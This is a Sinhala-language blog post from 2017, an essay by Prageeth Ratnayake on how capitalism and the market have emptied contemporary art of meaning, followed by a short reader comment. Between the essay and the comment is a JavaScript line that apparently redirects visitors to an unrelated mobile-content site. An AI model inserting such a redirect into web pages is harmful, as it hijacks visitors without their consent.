Saturday, April 1, 2017

A අකුරෙන් පටන් ගත් කලාව අද කෝ

ප‍්‍රගීත් රත්නායක

සමකාලීන මොහොත පිළිබඳ සංස්කෘතික ගොඩනැංවීමක් ලෙස අද දවසේ කලාව හා ජීවිතය යනු කුමක්ද? එය නිර්වචනය කරගත යුත්තේ කෙසේද? ධනවාදී සමාජයක අවසන් ඉනිම පසු කරමින් සිටින අප කලාව සහ ජීවිතය ලෙස බාර ගන්නේ කුමක්ද? එහි අර්ථය කුමක්ද? මූලික සමාජ අවශ්‍යතාවක් වූ තම පැවැත්ම වෙනුවෙන් ආදිකාලීන ගුහා සිත්තම් උපයෝගී කර ගත් බැව් ඓතිහාසික නිරීක්ෂණයන්ගෙන් සොයා ගත හැක. දඩයම කේන්ද්‍රීය වූ සමාජයක සිය පැවැත්මේ අනිවාර්ය වූ සාධකය වූයේ වන සතුන්ය. තමන්ට නෙත ගැටෙන වන සතුන්ගේ හැඩරුවට සමාන සතුන්ගේ රූප ගල් බිත්ති මත සිතුවම් කළ විට දඩයම සාර්ථක වන බව අභිචාර විදියක් ලෙස ඔවුහු විශ්වාස කළහ. එම විශ්වාසය මත ඔවුන් එදිනෙදා නෙත ගැටෙන වන සතුන්ගේ මූලික දෘශ්‍ය ස්වරූපයන් ලේ සහ වෙනත් අමුද්‍රව්‍ය ආදියෙන් ගල් බිත්ති මත තැබූ සටහන් ප‍්‍රංශයේ ලැස්කෝ සහ ස්පාඤ්ඤයේ අල්ටමීරා වැනි ගුහාවලින් අපට දැක ගත හැකිය. මෙසේ මූලික අවශ්‍යතාවන් සපුරා ගැනීම වෙනුවෙන් භාවිත වූ කලාව අද දවස වන විට නොයෙක් ආකෘතික, සමාජ, දේශපාලනික හා ආගමික අර්ථයන්ගේ හැඩය ගනිමින් වෙනස් වෙමින් අප අභිමුඛ ව ඇත. පැරණි සෞන්දර්යවේදයන් හා සමාජ විද්‍යාවන් වෙනස් වෙමින් අලූත් සෞන්දර්යවේදයන් හා සමාජ විද්‍යාවන්ගේ ආභාසයන් ලබමින් දැන් පවතින කලාව ප‍්‍රජාතාන්ත‍්‍රීය වී ඇත. කලින් කලාව තුළ තිබූ අධිපතිවාදී අදහස් මැකී ඇත. වෙනත් විදියකින් කිවහොත් කලාවේ හෙජමොනිය අවසන් වී ඇත.

තවදුරටත් චිත‍්‍ර හා මූර්ති ලෙස ඒකීය අදහසක් ලෙස පරිපූර්ණ වී තිබූ අදහස දෘශ්‍ය කලාව ලෙස පුළුල් වීමේදී චිත‍්‍ර ඇඳීම වෙනුවට චිත‍්‍ර හැදීම දක්වා ගමන් කර ඇත. මා විශ්වාස කරනුයේ එය ප‍්‍රකාශනයේ නිදහස වෙනුවෙන් දියුණු අවස්ථාවක් ලෙසය. තවදුරටත් ශිල්පියෙකුට තමන්ගේ ප‍්‍රකාශනයට චිත‍්‍ර කලාවේ මූලික ව්‍යාකරණ වන වර්ණ, රේඛා, හැඩතල සහ අවකාශය පමණක් භාවිත කළ යුතුයැයි නීතියක් පනවා ගත යුතු නැත. මන්ද මේ වන විට කලාවේ සීමාවන් පුළුල් වී ඇති හෙයිනි. මෙසේ ඓතිහාසිකව සමාජ දේශපාලනික කාරණාවන්ගේ ඇත්ත තත්ත්වයන් සමස්ත සමාජයේ සාරයන් සමග ගැටගැසුණු තත්ත්වයක් තුළ ඒවා වස්තු විෂයන් කොට නිර්මාණකරණයට යොමු වීම හා ගොඩනගන දෙයත් ගොඩනගන්නා අතරත් වෙන් කළ නොහැකි දේශපාලනික සම්බන්ධයක් අද දවසේ අපට සොයා ගත හැකිද? අඩුම තරමින් තමන්ගේ කෘතිය තුළ දේශපාලනික වන කාරණාව පසුවට තැබුවත්, තමන්ගේ ප‍්‍රකාශනයේ තාක්ෂණික කාරණාටික වත් සාක්ෂාත් කර ගන්නවාද? නැතහොත් කලාවේ භාෂාවට අපි කොතෙක් දුරට ඇතුල් වී සිටිනවාද? සහ තමාගේ කෘතියට කොතෙක් දුරට වගකියනවාද? ඒ වෙනුවෙන් පෙනී සිටිනවාද? නැත්නම් කලාවේ කතිකාවට අප තිබෙන සම්බන්ධය කුමක් කියා තේරුම් ගනිමින් ඉන්නවාද? මේවා මග හරිමින් අප කලාව යැයි කියමින් කරමින් ඉන්නේ මොනවාද?

ඝන වූ සියලූ දේවල් වාෂ්ප කිරීම ප‍්‍රාග්ධනයේ තර්කනයයි. එවිට ප‍්‍රාග්ධනයට අවශ්‍ය තැනට ගලාගෙන යන්නට පුළුවන. සහ එය වෙනස් කරන්නට පුළුවන. ඒ අර්ථයෙන් ගතහොත් අපේ ඇත්තම ඇත්ත සම්බන්ධතා අතරට ප‍්‍රාග්ධනය එහෙමත් නැත්නම් වෙළෙඳපොළ පොලා පැන අවසානය. කලාකාරයෙකු ලෙස ඔහු මේ දක්වා නඩත්තු කළ සාරය අද අහිමි කරගෙන තිබේ. තවදුරටත් කන බොන, රමණය කරන, ඇවිදින කවන්ධ බවට පත් වූ මිනිසුන් සමග අපට තව දුරටත් තිබෙන සම්බන්ධය කුමක්ද? මේ මොහොත වන විට අපි ප‍්‍රාග්ධනය රජයන, ආදරය ඩිජිටල් වන යුගයකට එළැඹ සිටිමු. ඩමි මනුෂත්වයෙන් පිරි සමාජය හෘදය සාක්ෂිය ගණිකා වෘත්තියේ යොදවමින් සිටී. ආදරය වෙනුවට එකිනෙකාගෙන් බලාපොරොත්තු වන්නේ ලාභයයි. අනාගතය අනාගතයට අයිති දෙයක් නොව වර්තමානයට අයිති දෙයක් බවට පත් වී ඇත. අප පශ්චාත් (මනස අහිමි* මිනිසුන් වී ඇත. ළඟම කෙනා පාවාදෙන්නෙකු බවට පත් වී ඇත. නරුමවාදය සොබාවික වී ඇති අතර දේශපාලනය අදේශපාලනය වී ඇත. කලාව (කලාව නොවන) දෙයක් බවට පත් වී ඇත. හොඳ මිනිසුන් වෙනුවට ලොකු මිනිසුන් බිහි වී ඇත. අනන්‍යතාව භාණ්ඩවලට මාරු වී ඇත. භාණ්ඩ අනන්‍යතාව බවට පත් වී ඇත. අනන්‍යතාව අර්බුදයක් බවට පත් වී ඇත. අර්බුදය විලාසිතාවක් බවට පත් වී ඇත. සමාජය ලූම්පන් වී ඇත. මෙවැනි සමාජ අවකාශයක කෘතිය සහ කෘතිය ගොඩනගන්නා අතර ඇතිවන සම්බන්ධයේ දේශපාලනික හැසිරීම කුමක් විය හැකිද? නිම නොවන වර්තමානයක වෙළෙඳපොළ මගින් සාදා දෙන ලද ආශාවක පදිංචි වීමට ඇබ්බැහි වී ඇති මිනිසුන්ට තවදුරටත් කලාව යනු ආත්ම ගවේෂණය කරන ඉසව්වක්ද? එහෙමත් නැත්නම් දේශපාලනික භාවිතයක යෙදීමට තිබෙන වැඩබිමක්ද? නැත. Architectural space එකක නොඑසේ නම් කුමක් හෝ Interior space එකක බිත්තියක වර්ණ මාලාවට ගැළපෙන හෝ modern sofa එකක වර්ණ මාලාවට ගැළපෙන කෘතියකින් ප‍්‍රමෝදයට පත් වීමට බොහෝ ශිල්පීහු කැමැත්තෙන් සිටිති. ප‍්‍රාග්ධන හිමිකාරීත්වයකට අයිතිකර ගැනීමකට එහා ගිය කලාකෘති අප විසින් නිපදවන්නේ කවදාද? ඓතිහාසිකව 43 කණ්ඩායමේ සිට ලංකාවේ චිත‍්‍ර කලාවට නූතනවාදය හඳුන්වා දුන් විප්ලවීය සිත්තරා වන එච්.ඒ. කරුණාරත්නයන්, චිත‍්‍රකලාවට ආකෘතික නිදහසක් සහ චිත‍්‍ර කලාවට භාෂාව හඳුන්වා දුන් ජගත් වීරසිංහයන් සහ මගේ පරම්පරාවේ සමහරුන් මෙම ක‍්‍රියාවේදී සවිඥානිකය. සමහර එන්ජී ඕ ව්‍යාපෘති ඇතුළේ ගලාගෙන එන අරමුදල්වලින් ජීවිතය ගැටගහ ගන්න ගමන් කලාව කියා කරන අරුම පුදුම දේවල් වැඩ නොවන්නේ, ඒ හා බැඳුණු තමන්ගේ ජීවිතයත් සමාජ සම්බන්ධයත් අතර කිසිම අන්තර් සම්බන්ධයක් නැති නිසාය. අප හුස්ම ගන්න සමාජ ශරීරයේ මේ මොහොතේ හඳුන්වා දී ඇති විනෝදයේ අසීමාන්තික සීමාව පුපුරවාහැරීමට ගරිල්ලා ප‍්‍රහාරයක් කලාකරුවෙකුගෙන් අද දවසේ බලාපොරොත්තු විය හැකිද? එය තවදුරටත් තනි තනිව කළ නොහැකි වෙහෙසකර වැඩකි. වචන වෙනුවට ක‍්‍රියාව ක‍්‍රියාත්මක කරන මෙහෙයුමක අනිවාර්ය බලාපොරොත්තුවකි.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2″;

1 comment:

  1. (අ)මුතු ඇටයට ජය වේවා..!
    the text අමුතු ඇටය කරමු ප්‍රගී....

    ReplyDelete

Texts

ආතති මුක්තය